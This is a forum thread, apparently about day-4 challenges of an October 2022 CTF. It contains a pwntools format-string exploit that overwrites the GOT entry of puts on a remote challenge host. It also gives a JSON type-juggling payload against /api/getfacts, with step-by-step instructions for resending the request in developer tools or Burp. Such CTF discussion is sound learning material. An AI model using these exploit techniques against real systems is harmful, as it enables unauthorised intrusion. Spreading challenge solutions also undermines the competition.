```
from pwn import *

context.binary = binary = ELF("./spooky_time", checksec=False)

got_puts_address=binary.got.puts

junk_payload = b"A"*0x2963

payload = b"%64X%11$n" + b"%4063X%8$hnAAA" + p64(got_puts_address+2) + p64(got_puts_address)

p = remote("167.71.138.188", 31648)
p.send(junk_payload)
p.send(payload)
p.interactive()

```

Can someone fix it and help me out with pwn ? Looks like a GOT overwrite D:

thanks again

POST /api/getfacts

{"type":true}

How can I use this? I am really sorry but I am new to CTFs, and I am trying to understand. Is it script ? terminal ? how can I use this ?

(October 26, 2022, 03:41 AM)P1blicEnemy Wrote: POST /api/getfacts

{"type":true}


How can I use this? I am really sorry but I am new to CTFs, and I am trying to understand. Is it script ? terminal ? how can I use this ?

Open the webpage. Press F-12 to open Developer Tools. Click Network tab and reload. See the "fetch" or 200 Post request to /api/getfacts? Click it. On right of dev tools, you will see headers, cookies, request, response, timings, stack trace, etc. Click Request and see that the request payload is {"type": "spooky"}. This is vulnerable to type juggling. Right click on the 200 request this time, and click 'edit and resend.' Now, you can modidy the request body and click send.

Thanks

(October 26, 2022, 03:41 AM)P1blicEnemy Wrote: POST /api/getfacts

{"type":true}


How can I use this? I am really sorry but I am new to CTFs, and I am trying to understand. Is it script ? terminal ? how can I use this ?

it's easy, use burp to capture request and modify

😁

(October 25, 2022, 01:05 PM)Hacker2222 Wrote: plz discuss day 4 challenges here

reversing challenge:

a

thx you

(October 25, 2022, 01:05 PM)Hacker2222 Wrote: plz discuss day 4 challenges here

reversing challenge:

thanks